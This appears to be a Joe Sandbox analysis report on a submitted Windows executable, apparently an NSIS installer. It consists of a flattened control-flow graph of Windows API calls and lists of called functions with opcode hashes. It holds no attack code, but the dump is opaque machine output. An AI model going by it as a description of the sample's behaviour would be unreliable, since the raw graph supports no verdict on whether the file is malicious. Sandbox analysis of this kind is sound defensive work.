4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread 
CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API 
calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 
4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 
API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 
403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 
405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 
3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 
4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 
40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 
Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                    • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
